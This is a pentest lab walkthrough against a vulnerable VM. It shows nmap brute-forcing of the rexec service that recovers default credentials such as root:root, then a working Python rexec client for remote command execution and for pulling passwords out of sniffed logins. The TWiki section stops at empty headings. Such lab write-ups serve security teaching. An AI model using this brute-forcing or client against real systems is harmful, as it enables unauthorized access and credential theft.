Pentest Target Machine Walkthrough --- 01
Preparation before the penetration test:
1. Target machine setup (plenty of ready-made vulnerable VMs are available online; the setup steps are skipped here)
2. Scan the target with OpenVAS to produce a vulnerability report
   1. OpenVAS setup steps: https://blog.51cto.com/linhong/2134910?source=drh
   2. Report download: https://download.csdn.net/download/m0_37268841/11855947
3. Vulnerability details:
Penetration test walkthrough:
1. rexec Passwordless / Unencrypted Cleartext Login
root@kali:~# nmap -p 512 --script rexec-brute 192.168.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-12 13:39 CST
Nmap scan report for 192.168.10.149
Host is up (0.081s latency).

PORT    STATE SERVICE
512/tcp open  exec
| rexec-brute:
|   Accounts:
|     root:root - Valid credentials
|     netadmin:netadmin - Valid credentials
|     user:user - Valid credentials
|     guest:guest - Valid credentials
|     web:12345 - Valid credentials
|     webadmin:webadmin - Valid credentials
|     administrator:administrator - Valid credentials
|     sysadmin:sysadmin - Valid credentials
|     admin:admin - Valid credentials
|     test:test - Valid credentials
|_  Statistics: Performed 26 guesses in 1 seconds, average tps: 26.0

Nmap done: 1 IP address (1 host up) scanned in 2.02 seconds
root@kali:~#
As the output shows, the rexec service on port 512 accepts logins with the password sent in cleartext, and the rexec-brute NSE script recovered ten valid username/password pairs (root:root among them) in about a second. Any of these pairs gives command execution on the target, and because the protocol is unencrypted the same credentials can also be read off the wire by anyone on the network path, with no brute-forcing at all. The fix is to disable the rexec/rsh services (usually started from inetd or xinetd) and use SSH instead.
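To make the "Unencrypted Cleartext Login" finding concrete, here is an added example that is not part of the original post and not nmap's own code: a minimal rexec client in Python that builds the login record a BSD rexec client sends to port 512 and interprets rexecd's one-byte status reply. The CAPTURED_LOGIN bytes are constructed here to stand in for what a sniffer on the path would capture for the netadmin:netadmin pair from the scan above; the rexec() function needs a live target and is the only part that is not exercised offline.

```python
import socket
from typing import Dict, Tuple

REXEC_PORT = 512  # the "exec" service the nmap scan above found open


def build_rexec_request(user: str, password: str, command: str, stderr_port: int = 0) -> bytes:
    """Build the login record a BSD rexec client sends right after connecting.

    The record is four NUL-terminated fields: the ASCII port number of an
    optional second connection for stderr ("0" = none), the username, the
    password and the command to run. Nothing is hashed or encrypted, which is
    what the scanner's "Unencrypted Cleartext Login" finding refers to.
    """
    for field in (user, password, command):
        if "\0" in field:
            raise ValueError("rexec fields cannot contain NUL bytes")
    fields = [str(stderr_port), user, password, command]
    return b"".join(f.encode() + b"\0" for f in fields)


def parse_rexec_reply(data: bytes) -> Tuple[bool, str]:
    """Interpret rexecd's reply.

    The first byte is a status: 0x00 means the login was accepted and whatever
    follows is the command's output; 0x01 means it was rejected and is followed
    by a newline-terminated error message such as "Login incorrect.".
    """
    if not data:
        raise ValueError("empty reply from server")
    if data[0] == 0:
        return True, data[1:].decode(errors="replace")
    message = data[1:].split(b"\n", 1)[0].decode(errors="replace")
    return False, message


def rexec(host: str, user: str, password: str, command: str, timeout: float = 5.0) -> Tuple[bool, str]:
    """Log in over cleartext rexec and run one command (needs a live target)."""
    with socket.create_connection((host, REXEC_PORT), timeout=timeout) as sock:
        sock.sendall(build_rexec_request(user, password, command))
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return parse_rexec_reply(b"".join(chunks))


def recover_cleartext_credentials(captured: bytes) -> Dict[str, object]:
    """Split a captured rexec login record back into its fields.

    This is the passive attacker's view of the protocol: the password comes
    out verbatim, no cracking required.
    """
    fields = captured.split(b"\0")
    # A complete record ends in NUL, so split() leaves a trailing empty element.
    if len(fields) < 5 or fields[-1] != b"":
        raise ValueError("not a complete rexec login record")
    stderr_port, user, password, command = (f.decode() for f in fields[:4])
    return {"stderr_port": int(stderr_port), "user": user,
            "password": password, "command": command}


# Constructed sample: the bytes a sniffer on the path would capture when a
# client logs in with one of the pairs reported by rexec-brute above.
CAPTURED_LOGIN = build_rexec_request("netadmin", "netadmin", "id")


if __name__ == "__main__":
    print(CAPTURED_LOGIN)
    print(recover_cleartext_credentials(CAPTURED_LOGIN))
    print(parse_rexec_reply(b"\x01Login incorrect.\n"))
```

Against a real target, rexec("192.168.10.149", "root", "root", "id") would send exactly the bytes build_rexec_request() produces, which is why a tcpdump on port 512 is as effective as the brute-force script: the whole login is four plaintext strings separated by NUL bytes.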
2. TWiki XSS and Command Execution Vulnerabilities (Port: 80)
   1. This high-severity finding is an application-layer vulnerability in the TWiki web application itself, not in the host.
   2. Scan the TWiki instance:
   3. Exploit the XSS vulnerability: